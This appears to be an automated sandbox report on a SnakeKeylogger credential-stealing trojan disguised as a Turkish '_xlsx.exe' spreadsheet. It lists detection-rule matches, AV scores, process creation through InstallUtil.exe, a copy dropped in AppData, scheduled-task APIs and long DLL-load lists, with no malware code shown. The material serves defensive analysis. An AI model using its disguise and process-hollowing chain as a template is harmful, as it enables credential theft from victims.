                    Source: 3.2.Tojeiuai.exe.43e7d70.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 3.2.Tojeiuai.exe.43e7d70.8.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 6544, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Tojeiuai.exe PID: 7104, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Tojeiuai.exe PID: 7104, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, GlobalWrapper.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, COVID19.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, VIPSeassion.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, VIPSeassion.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, ITaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, TaskFolder.cs | Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, Task.cs | Task registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, TaskService.cs | Task registration methods: 'CreateFromToken'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, TaskFolder.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, TaskPrincipal.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, Task.cs | Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, TaskSecurity.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, TaskSecurity.cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, User.cs | Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@8/2@3/3
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | File created: C:\Users\user\AppData\Roaming\Tojeiuai.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: NULL
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: InstallUtil.exe, 00000004.00000002.4496902509.0000000002CC8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000003059000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | ReversingLabs: Detection: 34%
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Virustotal: Detection: 42%
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | File read: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\Tojeiuai.exe "C:\Users\user\AppData\Roaming\Tojeiuai.exe"
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wtsapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winsta.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
